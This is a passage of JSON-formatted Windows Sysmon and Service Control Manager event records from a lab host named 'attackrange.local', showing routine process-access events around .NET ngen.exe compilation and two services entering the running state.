C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFD152E5147)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.710","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-0010E0B70900}","SourceProcessId":"3060","SourceThreadId":"4352","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","TargetProcessId":"3144","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFD152E5147)","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6466,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.710\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nTargetProcessId: 3144\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.710","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","TargetProcessId":"3144","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6467,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.710\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-001060B80900}\r\nSourceProcessId: 4440\r\nSourceThreadId: 1436\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nTargetProcessId: 3144\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.710","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-001060B80900}","SourceProcessId":"4440","SourceThreadId":"1436","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","TargetProcessId":"3144","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76870,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The Update Orchestrator Service for Windows Update service entered the running state.","param1":"Update Orchestrator Service for Windows Update","param2":"running","EventReceivedTime":"2020-08-01 08:03:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76871,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The Windows Insider Service service entered the running state.","param1":"Windows Insider Service","param2":"running","EventReceivedTime":"2020-08-01 08:03:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6468,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:10.507\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00104CBA0900}\r\nSourceProcessId: 4644\r\nSourceThreadId: 4792\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {41C8662E-21BE-5F25-0000-001082D30900}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000157404B)|UNKNOWN(0000000001573CFC)|UNKNOWN(0000000001571D03)|UNKNOWN(0000000001570B66)|UNKNOWN(000000000157054F)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+ebf6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+11e50(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+179f4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+117fd6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+18f637(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:10.507","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00104CBA0900}","SourceProcessId":"4644","SourceThreadId":"4792","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{41C8662E-21BE-5F25-0000-001082D30900}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000157404B)|UNKNOWN(0000000001573CFC)|UNKNOWN(0000000001571D03)|UNKNOWN(0000000001570B66)|UNKNOWN(000000000157054F)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+ebf6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+11e50(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+179f4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+117fd6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+18f637(wow64)","EventReceivedTime":"2020-08-01 08:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6469,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:10.507\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21BE-5F25-0000-001082D30900}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:10.507","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21BE-5F25-0000-001082D30900}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6470,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:10.507\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-001028BB0900}\r\nSourceProcessId: 3152\r\nSourceThreadId: 3288\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21BE-5F25-0000-001082D30900}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:10.507","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-001028BB0900}","SourceProcessId":"3152","SourceThreadId":"3288","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21BE-5F25-0000-001082D30900}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6471,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:10.554\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-21BE-5F25-0000-001082D30900}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:10.554","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-21BE-5F25-0000-001082D30900}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6472,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:10.554\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-21BE-5F25-0000-001082D30900}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:10.554","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-21BE-5F25-0000-001082D30900}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6473,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:10.585\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00104CBA0900}\r\nSourceProcessId: 4644\r\nSourceThreadId: 4792\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000157404B)|UNKNOWN(0000000001573CFC)|UNKNOWN(0000000001574ADD)|UNKNOWN(0000000001572444)|UNKNOWN(0000000001570B66)|UNKNOWN(000000000157054F)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+ebf6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+11e50(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+179f4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+117fd6(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:10.585","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00104CBA0900}","SourceProcessId":"4644","SourceThreadId":"4792","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000157404B)|UNKNOWN(0000000001573CFC)|UNKNOWN(0000000001574ADD)|UNKNOWN(0000000001572444)|UNKNOWN(0000000001570B66)|UNKNOWN(000000000157054F)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+ebf6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+11e50(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+179f4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+117fd6(wow64)","EventReceivedTime":"2020-08-01 08:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
